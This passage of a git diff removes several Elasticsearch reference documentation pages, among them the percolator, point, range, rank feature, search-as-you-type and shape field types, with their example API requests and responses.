"source": { - "index": "index" - }, - "dest": { - "index": "new_index" - } -} - -POST _aliases -{ - "actions": [ <1> - { - "remove": { - "index" : "index", - "alias": "queries" - } - }, - { - "add": { - "index": "new_index", - "alias": "queries" - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -<1> If you have an alias don't forget to point it to the new index. - -Executing the `percolate` query via the `queries` alias: - -[source,console] --------------------------------------------------- -GET /queries/_search -{ - "query": { - "percolate" : { - "field" : "query", - "document" : { - "body" : "fox jumps over the lazy dog" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -now returns matches from the new index: - -[source,console-result] --------------------------------------------------- -{ - "took": 3, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.13076457, - "hits": [ - { - "_index": "new_index", <1> - "_type": "_doc", - "_id": "1", - "_score": 0.13076457, - "_source": { - "query": { - "match": { - "body": "quick brown fox" - } - } - }, - "fields" : { - "_percolator_document_slot" : [0] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 3,/"took": "$body.took",/] - -<1> Percolator query hit is now being presented from the new index. - -[discrete] -==== Optimizing query time text analysis - -When the percolator verifies a percolator candidate match it is going to parse, perform query time text analysis and actually run -the percolator query on the document being percolated. This is done for each candidate match and every time the `percolate` query executes. -If your query time text analysis is relatively expensive part of query parsing then text analysis can become the -dominating factor time is being spent on when percolating. This query parsing overhead can become noticeable when the -percolator ends up verifying many candidate percolator query matches. - -To avoid the most expensive part of text analysis at percolate time. One can choose to do the expensive part of text analysis -when indexing the percolator query. This requires using two different analyzers. The first analyzer actually performs -text analysis that needs be performed (expensive part). The second analyzer (usually whitespace) just splits the generated tokens -that the first analyzer has produced. Then before indexing a percolator query, the analyze api should be used to analyze the query -text with the more expensive analyzer. The result of the analyze api, the tokens, should be used to substitute the original query -text in the percolator query. It is important that the query should now be configured to override the analyzer from the mapping and -just the second analyzer. Most text based queries support an `analyzer` option (`match`, `query_string`, `simple_query_string`). -Using this approach the expensive text analysis is performed once instead of many times. - -Lets demonstrate this workflow via a simplified example. - -Lets say we want to index the following percolator query: - -[source,js] --------------------------------------------------- -{ - "query" : { - "match" : { - "body" : { - "query" : "missing bicycles" - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -with these settings and mapping: - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer" : { - "tokenizer": "standard", - "filter" : ["lowercase", "porter_stem"] - } - } - } - }, - "mappings": { - "properties": { - "query" : { - "type": "percolator" - }, - "body" : { - "type": "text", - "analyzer": "my_analyzer" <1> - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> For the purpose of this example, this analyzer is considered expensive. - -First we need to use the analyze api to perform the text analysis prior to indexing: - -[source,console] --------------------------------------------------- -POST /test_index/_analyze -{ - "analyzer" : "my_analyzer", - "text" : "missing bicycles" -} --------------------------------------------------- -// TEST[continued] - -This results the following response: - -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "miss", - "start_offset": 0, - "end_offset": 7, - "type": "", - "position": 0 - }, - { - "token": "bicycl", - "start_offset": 8, - "end_offset": 16, - "type": "", - "position": 1 - } - ] -} --------------------------------------------------- - -All the tokens in the returned order need to replace the query text in the percolator query: - -[source,console] --------------------------------------------------- -PUT /test_index/_doc/1?refresh -{ - "query" : { - "match" : { - "body" : { - "query" : "miss bicycl", - "analyzer" : "whitespace" <1> - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> It is important to select a whitespace analyzer here, otherwise the analyzer defined in the mapping will be used, -which defeats the point of using this workflow. Note that `whitespace` is a built-in analyzer, if a different analyzer -needs to be used, it needs to be configured first in the index's settings. - -The analyze api prior to the indexing the percolator flow should be done for each percolator query. - -At percolate time nothing changes and the `percolate` query can be defined normally: - -[source,console] --------------------------------------------------- -GET /test_index/_search -{ - "query": { - "percolate" : { - "field" : "query", - "document" : { - "body" : "Bycicles are missing" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -This results in a response like this: - -[source,console-result] --------------------------------------------------- -{ - "took": 6, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.13076457, - "hits": [ - { - "_index": "test_index", - "_type": "_doc", - "_id": "1", - "_score": 0.13076457, - "_source": { - "query": { - "match": { - "body": { - "query": "miss bicycl", - "analyzer": "whitespace" - } - } - } - }, - "fields" : { - "_percolator_document_slot" : [0] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 6,/"took": "$body.took",/] - -[discrete] -==== Optimizing wildcard queries. - -Wildcard queries are more expensive than other queries for the percolator, -especially if the wildcard expressions are large. - -In the case of `wildcard` queries with prefix wildcard expressions or just the `prefix` query, -the `edge_ngram` token filter can be used to replace these queries with regular `term` -query on a field where the `edge_ngram` token filter is configured. - -Creating an index with custom analysis settings: - -[source,console] --------------------------------------------------- -PUT my_queries1 -{ - "settings": { - "analysis": { - "analyzer": { - "wildcard_prefix": { <1> - "type": "custom", - "tokenizer": "standard", - "filter": [ - "lowercase", - "wildcard_edge_ngram" - ] - } - }, - "filter": { - "wildcard_edge_ngram": { <2> - "type": "edge_ngram", - "min_gram": 1, - "max_gram": 32 - } - } - } - }, - "mappings": { - "properties": { - "query": { - "type": "percolator" - }, - "my_field": { - "type": "text", - "fields": { - "prefix": { <3> - "type": "text", - "analyzer": "wildcard_prefix", - "search_analyzer": "standard" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The analyzer that generates the prefix tokens to be used at index time only. -<2> Increase the `min_gram` and decrease `max_gram` settings based on your prefix search needs. -<3> This multifield should be used to do the prefix search - with a `term` or `match` query instead of a `prefix` or `wildcard` query. - - -Then instead of indexing the following query: - -[source,js] --------------------------------------------------- -{ - "query": { - "wildcard": { - "my_field": "abc*" - } - } -} --------------------------------------------------- -// NOTCONSOLE - -this query below should be indexed: - -[source,console] --------------------------------------------------- -PUT /my_queries1/_doc/1?refresh -{ - "query": { - "term": { - "my_field.prefix": "abc" - } - } -} --------------------------------------------------- -// TEST[continued] - -This way can handle the second query more efficiently than the first query. - -The following search request will match with the previously indexed -percolator query: - -[source,console] --------------------------------------------------- -GET /my_queries1/_search -{ - "query": { - "percolate": { - "field": "query", - "document": { - "my_field": "abcd" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took": 6, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.18864399, - "hits": [ - { - "_index": "my_queries1", - "_type": "_doc", - "_id": "1", - "_score": 0.18864399, - "_source": { - "query": { - "term": { - "my_field.prefix": "abc" - } - } - }, - "fields": { - "_percolator_document_slot": [ - 0 - ] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 6,/"took": "$body.took",/] - -The same technique can also be used to speed up suffix -wildcard searches. By using the `reverse` token filter -before the `edge_ngram` token filter. - -[source,console] --------------------------------------------------- -PUT my_queries2 -{ - "settings": { - "analysis": { - "analyzer": { - "wildcard_suffix": { - "type": "custom", - "tokenizer": "standard", - "filter": [ - "lowercase", - "reverse", - "wildcard_edge_ngram" - ] - }, - "wildcard_suffix_search_time": { - "type": "custom", - "tokenizer": "standard", - "filter": [ - "lowercase", - "reverse" - ] - } - }, - "filter": { - "wildcard_edge_ngram": { - "type": "edge_ngram", - "min_gram": 1, - "max_gram": 32 - } - } - } - }, - "mappings": { - "properties": { - "query": { - "type": "percolator" - }, - "my_field": { - "type": "text", - "fields": { - "suffix": { - "type": "text", - "analyzer": "wildcard_suffix", - "search_analyzer": "wildcard_suffix_search_time" <1> - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> A custom analyzer is needed at search time too, because otherwise - the query terms are not being reversed and would otherwise not match - with the reserved suffix tokens. - -Then instead of indexing the following query: - -[source,js] --------------------------------------------------- -{ - "query": { - "wildcard": { - "my_field": "*xyz" - } - } -} --------------------------------------------------- -// NOTCONSOLE - -the following query below should be indexed: - -[source,console] --------------------------------------------------- -PUT /my_queries2/_doc/2?refresh -{ - "query": { - "match": { <1> - "my_field.suffix": "xyz" - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The `match` query should be used instead of the `term` query, - because text analysis needs to reverse the query terms. - -The following search request will match with the previously indexed -percolator query: - -[source,console] --------------------------------------------------- -GET /my_queries2/_search -{ - "query": { - "percolate": { - "field": "query", - "document": { - "my_field": "wxyz" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[discrete] -==== Dedicated Percolator Index - -Percolate queries can be added to any index. Instead of adding percolate queries to the index the data resides in, -these queries can also be added to a dedicated index. The advantage of this is that this dedicated percolator index -can have its own index settings (For example the number of primary and replica shards). If you choose to have a dedicated -percolate index, you need to make sure that the mappings from the normal index are also available on the percolate index. -Otherwise percolate queries can be parsed incorrectly. - -[discrete] -==== Forcing Unmapped Fields to be Handled as Strings - -In certain cases it is unknown what kind of percolator queries do get registered, and if no field mapping exists for fields -that are referred by percolator queries then adding a percolator query fails. This means the mapping needs to be updated -to have the field with the appropriate settings, and then the percolator query can be added. But sometimes it is sufficient -if all unmapped fields are handled as if these were default text fields. In those cases one can configure the -`index.percolator.map_unmapped_fields_as_text` setting to `true` (default to `false`) and then if a field referred in -a percolator query does not exist, it will be handled as a default text field so that adding the percolator query doesn't -fail. - -[discrete] -==== Limitations - -[discrete] -[[parent-child]] -===== Parent/child - -Because the `percolate` query is processing one document at a time, it doesn't support queries and filters that run -against child documents such as `has_child` and `has_parent`. - -[discrete] -===== Fetching queries - -There are a number of queries that fetch data via a get call during query parsing. For example the `terms` query when -using terms lookup, `template` query when using indexed scripts and `geo_shape` when using pre-indexed shapes. When these -queries are indexed by the `percolator` field type then the get call is executed once. So each time the `percolator` -query evaluates these queries, the fetches terms, shapes etc. as the were upon index time will be used. Important to note -is that fetching of terms that these queries do, happens both each time the percolator query gets indexed on both primary -and replica shards, so the terms that are actually indexed can be different between shard copies, if the source index -changed while indexing. - -[discrete] -===== Script query - -The script inside a `script` query can only access doc values fields. The `percolate` query indexes the provided document -into an in-memory index. This in-memory index doesn't support stored fields and because of that the `_source` field and -other stored fields are not stored. This is the reason why in the `script` query the `_source` and other stored fields -aren't available. - -[discrete] -===== Field aliases - -Percolator queries that contain <> may not always behave as expected. In particular, if a -percolator query is registered that contains a field alias, and then that alias is updated in the mappings to refer -to a different field, the stored query will still refer to the original target field. To pick up the change to -the field alias, the percolator query must be explicitly reindexed. diff --git a/docs/reference/mapping/types/point.asciidoc b/docs/reference/mapping/types/point.asciidoc deleted file mode 100644 index f0645ef1e65..00000000000 --- a/docs/reference/mapping/types/point.asciidoc +++ /dev/null @@ -1,99 +0,0 @@ -[[point]] -[role="xpack"] -[testenv="basic"] -=== Point field type -++++ -Point -++++ - -The `point` data type facilitates the indexing of and searching -arbitrary `x, y` pairs that fall in a 2-dimensional planar -coordinate system. - -You can query documents using this type using -<>. - -There are four ways that a point may be specified, as demonstrated below: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "location": { - "type": "point" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "text": "Point as an object", - "location": { <1> - "x": 41.12, - "y": -71.34 - } -} - -PUT my-index-000001/_doc/2 -{ - "text": "Point as a string", - "location": "41.12,-71.34" <2> -} - - -PUT my-index-000001/_doc/4 -{ - "text": "Point as an array", - "location": [41.12, -71.34] <3> -} - -PUT my-index-000001/_doc/5 -{ - "text": "Point as a WKT POINT primitive", - "location" : "POINT (41.12 -71.34)" <4> -} - --------------------------------------------------- - -<1> Point expressed as an object, with `x` and `y` keys. -<2> Point expressed as a string with the format: `"x,y"`. -<3> Point expressed as an array with the format: [ `x`, `y`] -<4> Point expressed as a https://docs.opengeospatial.org/is/12-063r5/12-063r5.html[Well-Known Text] -POINT with the format: `"POINT(x y)"` - -The coordinates provided to the indexer are single precision floating point values so -the field guarantees the same accuracy provided by the java virtual machine (typically -`1E-38`). - -[[point-params]] -==== Parameters for `point` fields - -The following parameters are accepted by `point` fields: - -[horizontal] - -<>:: - - If `true`, malformed points are ignored. If `false` (default), - malformed points throw an exception and reject the whole document. - -`ignore_z_value`:: - - If `true` (default) three dimension points will be accepted (stored in source) - but only x and y values will be indexed; the third dimension is - ignored. If `false`, points containing any more than x and y - (two dimensions) values throw an exception and reject the whole document. - -<>:: - - Accepts an point value which is substituted for any explicit `null` values. - Defaults to `null`, which means the field is treated as missing. - -==== Sorting and retrieving points - -It is currently not possible to sort points or retrieve their fields -directly. The `point` value is only retrievable through the `_source` -field. diff --git a/docs/reference/mapping/types/range.asciidoc b/docs/reference/mapping/types/range.asciidoc deleted file mode 100644 index 4d75b6d6ac1..00000000000 --- a/docs/reference/mapping/types/range.asciidoc +++ /dev/null @@ -1,238 +0,0 @@ -[[range]] -=== Range field types -++++ -Range -++++ - -Range field types represent a continuous range of values between an upper and lower -bound. For example, a range can represent _any date in October_ or _any -integer from 0 to 9_. They are defined using the operators -`gt` or `gte` for the lower bound, and `lt` or `lte` for the upper bound. -They can be used for querying, and have -limited support for aggregations. The only supported aggregations are -{ref}/search-aggregations-bucket-histogram-aggregation.html[histogram], -{ref}/search-aggregations-metrics-cardinality-aggregation.html[cardinality]. - -The following range types are supported: - -[horizontal] -`integer_range`:: A range of signed 32-bit integers with a minimum value of +-2^31^+ and maximum of +2^31^-1+. -`float_range`:: A range of single-precision 32-bit IEEE 754 floating point values. -`long_range`:: A range of signed 64-bit integers with a minimum value of +-2^63^+ and maximum of +2^63^-1+. -`double_range`:: A range of double-precision 64-bit IEEE 754 floating point values. -`date_range`:: A range of <> values. Date ranges support various date formats - through the <> mapping parameter. Regardless of - the format used, date values are parsed into an unsigned 64-bit integer - representing milliseconds since the Unix epoch in UTC. Values containing the - `now` <> expression are not supported. -`ip_range` :: A range of ip values supporting either {wikipedia}/IPv4[IPv4] or - {wikipedia}/IPv6[IPv6] (or mixed) addresses. - -Below is an example of configuring a mapping with various range fields followed by an example that indexes several range types. - -[source,console] --------------------------------------------------- -PUT range_index -{ - "settings": { - "number_of_shards": 2 - }, - "mappings": { - "properties": { - "expected_attendees": { - "type": "integer_range" - }, - "time_frame": { - "type": "date_range", <1> - "format": "yyyy-MM-dd HH:mm:ss||yyyy-MM-dd||epoch_millis" - } - } - } -} - -PUT range_index/_doc/1?refresh -{ - "expected_attendees" : { <2> - "gte" : 10, - "lt" : 20 - }, - "time_frame" : { - "gte" : "2015-10-31 12:00:00", <3> - "lte" : "2015-11-01" - } -} --------------------------------------------------- -// TESTSETUP - -<1> `date_range` types accept the same field parameters defined by the <> type. -<2> Example indexing a meeting with 10 to 20 attendees, not including 20. -<3> Example date range using date time stamp. - -The following is an example of a <> on the `integer_range` field named "expected_attendees". -12 is a value inside the range, so it will match. - -[source,console] --------------------------------------------------- -GET range_index/_search -{ - "query" : { - "term" : { - "expected_attendees" : { - "value": 12 - } - } - } -} --------------------------------------------------- - -The result produced by the above query. - -[source,console-result] --------------------------------------------------- -{ - "took": 13, - "timed_out": false, - "_shards" : { - "total": 2, - "successful": 2, - "skipped" : 0, - "failed": 0 - }, - "hits" : { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score" : 1.0, - "hits" : [ - { - "_index" : "range_index", - "_type" : "_doc", - "_id" : "1", - "_score" : 1.0, - "_source" : { - "expected_attendees" : { - "gte" : 10, "lt" : 20 - }, - "time_frame" : { - "gte" : "2015-10-31 12:00:00", "lte" : "2015-11-01" - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 13/"took" : $body.took/] - -The following is an example of a `date_range` query over the `date_range` field named "time_frame". - -[source,console] --------------------------------------------------- -GET range_index/_search -{ - "query" : { - "range" : { - "time_frame" : { <1> - "gte" : "2015-10-31", - "lte" : "2015-11-01", - "relation" : "within" <2> - } - } - } -} --------------------------------------------------- - -<1> Range queries work the same as described in <>. -<2> Range queries over range <> support a `relation` parameter which can be one of `WITHIN`, `CONTAINS`, - `INTERSECTS` (default). - -This query produces a similar result: - -[source,console-result] --------------------------------------------------- -{ - "took": 13, - "timed_out": false, - "_shards" : { - "total": 2, - "successful": 2, - "skipped" : 0, - "failed": 0 - }, - "hits" : { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score" : 1.0, - "hits" : [ - { - "_index" : "range_index", - "_type" : "_doc", - "_id" : "1", - "_score" : 1.0, - "_source" : { - "expected_attendees" : { - "gte" : 10, "lt" : 20 - }, - "time_frame" : { - "gte" : "2015-10-31 12:00:00", "lte" : "2015-11-01" - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 13/"took" : $body.took/] - -[[ip-range]] -==== IP Range - -In addition to the range format above, IP ranges can be provided in -{wikipedia}/Classless_Inter-Domain_Routing#CIDR_notation[CIDR] notation: - -[source,console] --------------------------------------------------- -PUT range_index/_mapping -{ - "properties": { - "ip_allowlist": { - "type": "ip_range" - } - } -} - -PUT range_index/_doc/2 -{ - "ip_allowlist" : "192.168.0.0/16" -} --------------------------------------------------- - -[[range-params]] -==== Parameters for range fields - -The following parameters are accepted by range types: - -[horizontal] - -<>:: - - Try to convert strings to numbers and truncate fractions for integers. - Accepts `true` (default) and `false`. - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be searchable? Accepts `true` (default) and `false`. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). diff --git a/docs/reference/mapping/types/rank-feature.asciidoc b/docs/reference/mapping/types/rank-feature.asciidoc deleted file mode 100644 index 01f213c78ed..00000000000 --- a/docs/reference/mapping/types/rank-feature.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[rank-feature]] -=== Rank feature field type -++++ -Rank feature -++++ - -A `rank_feature` field can index numbers so that they can later be used to boost -documents in queries with a <> query. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "pagerank": { - "type": "rank_feature" <1> - }, - "url_length": { - "type": "rank_feature", - "positive_score_impact": false <2> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "pagerank": 8, - "url_length": 22 -} - -GET my-index-000001/_search -{ - "query": { - "rank_feature": { - "field": "pagerank" - } - } -} --------------------------------------------------- - -<1> Rank feature fields must use the `rank_feature` field type -<2> Rank features that correlate negatively with the score need to declare it - -NOTE: `rank_feature` fields only support single-valued fields and strictly positive -values. Multi-valued fields and negative values will be rejected. - -NOTE: `rank_feature` fields do not support querying, sorting or aggregating. They may -only be used within <> queries. - -NOTE: `rank_feature` fields only preserve 9 significant bits for the precision, which -translates to a relative error of about 0.4%. - -Rank features that correlate negatively with the score should set -`positive_score_impact` to `false` (defaults to `true`). This will be used by -the <> query to modify the scoring formula -in such a way that the score decreases with the value of the feature instead of -increasing. For instance in web search, the url length is a commonly used -feature which correlates negatively with scores. diff --git a/docs/reference/mapping/types/rank-features.asciidoc b/docs/reference/mapping/types/rank-features.asciidoc deleted file mode 100644 index 69bbdbb0bc4..00000000000 --- a/docs/reference/mapping/types/rank-features.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -[[rank-features]] -=== Rank features field type -++++ -Rank features -++++ - -A `rank_features` field can index numeric feature vectors, so that they can -later be used to boost documents in queries with a -<> query. - -It is analogous to the <> data type but is better suited -when the list of features is sparse so that it wouldn't be reasonable to add -one field to the mappings for each of them. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "topics": { - "type": "rank_features" <1> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "topics": { <2> - "politics": 20, - "economics": 50.8 - } -} - -PUT my-index-000001/_doc/2 -{ - "topics": { - "politics": 5.2, - "sports": 80.1 - } -} - -GET my-index-000001/_search -{ - "query": { - "rank_feature": { - "field": "topics.politics" - } - } -} --------------------------------------------------- - -<1> Rank features fields must use the `rank_features` field type -<2> Rank features fields must be a hash with string keys and strictly positive numeric values - -NOTE: `rank_features` fields only support single-valued features and strictly -positive values. Multi-valued fields and zero or negative values will be rejected. - -NOTE: `rank_features` fields do not support sorting or aggregating and may -only be queried using <> queries. - -NOTE: `rank_features` fields only preserve 9 significant bits for the -precision, which translates to a relative error of about 0.4%. - diff --git a/docs/reference/mapping/types/search-as-you-type.asciidoc b/docs/reference/mapping/types/search-as-you-type.asciidoc deleted file mode 100644 index 0439eee56fc..00000000000 --- a/docs/reference/mapping/types/search-as-you-type.asciidoc +++ /dev/null @@ -1,257 +0,0 @@ -[[search-as-you-type]] -=== Search-as-you-type field type -++++ -Search-as-you-type -++++ - -The `search_as_you_type` field type is a text-like field that is optimized to -provide out-of-the-box support for queries that serve an as-you-type completion -use case. It creates a series of subfields that are analyzed to index terms -that can be efficiently matched by a query that partially matches the entire -indexed text value. Both prefix completion (i.e matching terms starting at the -beginning of the input) and infix completion (i.e. matching terms at any -position within the input) are supported. - -When adding a field of this type to a mapping - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_field": { - "type": "search_as_you_type" - } - } - } -} --------------------------------------------------- - -This creates the following fields - -[horizontal] - -`my_field`:: - - Analyzed as configured in the mapping. If an analyzer is not configured, - the default analyzer for the index is used - -`my_field._2gram`:: - - Wraps the analyzer of `my_field` with a shingle token filter of shingle - size 2 - -`my_field._3gram`:: - - Wraps the analyzer of `my_field` with a shingle token filter of shingle - size 3 - -`my_field._index_prefix`:: - - Wraps the analyzer of `my_field._3gram` with an edge ngram token filter - - -The size of shingles in subfields can be configured with the `max_shingle_size` -mapping parameter. The default is 3, and valid values for this parameter are -integer values 2 - 4 inclusive. Shingle subfields will be created for each -shingle size from 2 up to and including the `max_shingle_size`. The -`my_field._index_prefix` subfield will always use the analyzer from the shingle -subfield with the `max_shingle_size` when constructing its own analyzer. - -Increasing the `max_shingle_size` will improve matches for queries with more -consecutive terms, at the cost of larger index size. The default -`max_shingle_size` should usually be sufficient. - -The same input text is indexed into each of these fields automatically, with -their differing analysis chains, when an indexed document has a value for the -root field `my_field`. - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1?refresh -{ - "my_field": "quick brown fox jump lazy dog" -} --------------------------------------------------- -// TEST[continued] - -The most efficient way of querying to serve a search-as-you-type use case is -usually a <> query of type -<> that targets the root -`search_as_you_type` field and its shingle subfields. This can match the query -terms in any order, but will score documents higher if they contain the terms -in order in a shingle subfield. - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "multi_match": { - "query": "brown f", - "type": "bool_prefix", - "fields": [ - "my_field", - "my_field._2gram", - "my_field._3gram" - ] - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took" : 44, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 1, - "relation" : "eq" - }, - "max_score" : 0.8630463, - "hits" : [ - { - "_index" : "my-index-000001", - "_type" : "_doc", - "_id" : "1", - "_score" : 0.8630463, - "_source" : { - "my_field" : "quick brown fox jump lazy dog" - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 44/"took" : $body.took/] -// TESTRESPONSE[s/"max_score" : 0.8630463/"max_score" : $body.hits.max_score/] -// TESTRESPONSE[s/"_score" : 0.8630463/"_score" : $body.hits.hits.0._score/] - -To search for documents that strictly match the query terms in order, or to -search using other properties of phrase queries, use a -<> on the root -field. A <> can also be used -if the last term should be matched exactly, and not as a prefix. Using phrase -queries may be less efficient than using the `match_bool_prefix` query. - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "match_phrase_prefix": { - "my_field": "brown f" - } - } -} --------------------------------------------------- -// TEST[continued] - -[[specific-params]] -==== Parameters specific to the `search_as_you_type` field - -The following parameters are accepted in a mapping for the `search_as_you_type` -field and are specific to this field type - -`max_shingle_size`:: -+ --- -(Optional, integer) -Largest shingle size to create. Valid values are `2` (inclusive) to `4` -(inclusive). Defaults to `3`. - -A subfield is created for each integer between `2` and this value. For example, -a value of `3` creates two subfields: `my_field._2gram` and `my_field._3gram` - -More subfields enables more specific queries but increases index size. --- - -[[general-params]] -==== Parameters of the field type as a text field - -The following parameters are accepted in a mapping for the `search_as_you_type` -field due to its nature as a text-like field, and behave similarly to their -behavior when configuring a field of the <> data type. Unless -otherwise noted, these options configure the root fields subfields in -the same way. - -<>:: - - The <> which should be used for - `text` fields, both at index-time and at - search-time (unless overridden by the - <>). Defaults to the default index - analyzer, or the <>. - -<>:: - - Should the field be searchable? Accepts `true` (default) or `false`. - -<>:: - - What information should be stored in the index, for search and highlighting - purposes. Defaults to `positions`. - -<>:: - - Whether field-length should be taken into account when scoring queries. - Accepts `true` or `false`. This option configures the root field - and shingle subfields, where its default is `true`. It does not configure - the prefix subfield, where it it `false`. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). This option only configures the root field, and does not - configure any subfields. - -<>:: - - The <> that should be used at search time on - <> fields. Defaults to the `analyzer` setting. - -<>:: - - The <> that should be used at search time when a - phrase is encountered. Defaults to the `search_analyzer` setting. - -<>:: - - Which scoring algorithm or _similarity_ should be used. Defaults - to `BM25`. - -<>:: - - Whether term vectors should be stored for the field. Defaults to `no`. This option configures the root field and shingle - subfields, but not the prefix subfield. - - -[[prefix-queries]] -==== Optimization of prefix queries - -When making a <> query to the root field or -any of its subfields, the query will be rewritten to a -<> query on the `._index_prefix` subfield. This -matches more efficiently than is typical of `prefix` queries on text fields, -as prefixes up to a certain length of each shingle are indexed directly as -terms in the `._index_prefix` subfield. - -The analyzer of the `._index_prefix` subfield slightly modifies the -shingle-building behavior to also index prefixes of the terms at the end of the -field's value that normally would not be produced as shingles. For example, if -the value `quick brown fox` is indexed into a `search_as_you_type` field with -`max_shingle_size` of 3, prefixes for `brown fox` and `fox` are also indexed -into the `._index_prefix` subfield even though they do not appear as terms in -the `._3gram` subfield. This allows for completion of all the terms in the -field's input. diff --git a/docs/reference/mapping/types/shape.asciidoc b/docs/reference/mapping/types/shape.asciidoc deleted file mode 100644 index 9599da3325a..00000000000 --- a/docs/reference/mapping/types/shape.asciidoc +++ /dev/null @@ -1,441 +0,0 @@ -[[shape]] -[role="xpack"] -[testenv="basic"] -=== Shape field type -++++ -Shape -++++ - -The `shape` data type facilitates the indexing of and searching -with arbitrary `x, y` cartesian shapes such as rectangles and polygons. It can be -used to index and query geometries whose coordinates fall in a 2-dimensional planar -coordinate system. - -You can query documents using this type using -<>. - -[[shape-mapping-options]] -[discrete] -==== Mapping Options - -Like the <> field type, the `shape` field mapping maps -http://geojson.org[GeoJSON] or https://docs.opengeospatial.org/is/12-063r5/12-063r5.html[Well-Known Text] -(WKT) geometry objects to the shape type. To enable it, users must explicitly map -fields to the shape type. - -[cols="<,<,<",options="header",] -|======================================================================= -|Option |Description| Default - -|`orientation` |Optionally define how to interpret vertex order for -polygons / multipolygons. This parameter defines one of two coordinate -system rules (Right-hand or Left-hand) each of which can be specified in three -different ways. 1. Right-hand rule: `right`, `ccw`, `counterclockwise`, -2. Left-hand rule: `left`, `cw`, `clockwise`. The default orientation -(`counterclockwise`) complies with the OGC standard which defines -outer ring vertices in counterclockwise order with inner ring(s) vertices (holes) -in clockwise order. Setting this parameter in the geo_shape mapping explicitly -sets vertex order for the coordinate list of a geo_shape field but can be -overridden in each individual GeoJSON or WKT document. -| `ccw` - -|`ignore_malformed` |If true, malformed GeoJSON or WKT shapes are ignored. If -false (default), malformed GeoJSON and WKT shapes throw an exception and reject the -entire document. -| `false` - -|`ignore_z_value` |If `true` (default) three dimension points will be accepted (stored in source) -but only latitude and longitude values will be indexed; the third dimension is ignored. If `false`, -geo-points containing any more than latitude and longitude (two dimensions) values throw an exception -and reject the whole document. -| `true` - -|`coerce` |If `true` unclosed linear rings in polygons will be automatically closed. -| `false` - -|======================================================================= - -[[shape-indexing-approach]] -[discrete] -==== Indexing approach -Like `geo_shape`, the `shape` field type is indexed by decomposing geometries into -a triangular mesh and indexing each triangle as a 7 dimension point in a BKD tree. -The coordinates provided to the indexer are single precision floating point values so -the field guarantees the same accuracy provided by the java virtual machine (typically -`1E-38`). For polygons/multi-polygons the performance of the tessellator primarily -depends on the number of vertices that define the geometry. - -*IMPORTANT NOTES* - -`CONTAINS` relation query - `shape` queries with `relation` defined as `contains` are supported -for indices created with ElasticSearch 7.5.0 or higher. - -[discrete] -===== Example - -[source,console] --------------------------------------------------- -PUT /example -{ - "mappings": { - "properties": { - "geometry": { - "type": "shape" - } - } - } -} --------------------------------------------------- -// TESTSETUP - -This mapping definition maps the geometry field to the shape type. The indexer uses single -precision floats for the vertex values so accuracy is guaranteed to the same precision as -`float` values provided by the java virtual machine approximately (typically 1E-38). - -[[shape-input-structure]] -[discrete] -==== Input Structure - -Shapes can be represented using either the http://geojson.org[GeoJSON] -or https://docs.opengeospatial.org/is/12-063r5/12-063r5.html[Well-Known Text] -(WKT) format. The following table provides a mapping of GeoJSON and WKT -to Elasticsearch types: - -[cols="<,<,<,<",options="header",] -|======================================================================= -|GeoJSON Type |WKT Type |Elasticsearch Type |Description - -|`Point` |`POINT` |`point` |A single `x, y` coordinate. -|`LineString` |`LINESTRING` |`linestring` |An arbitrary line given two or more points. -|`Polygon` |`POLYGON` |`polygon` |A _closed_ polygon whose first and last point -must match, thus requiring `n + 1` vertices to create an `n`-sided -polygon and a minimum of `4` vertices. 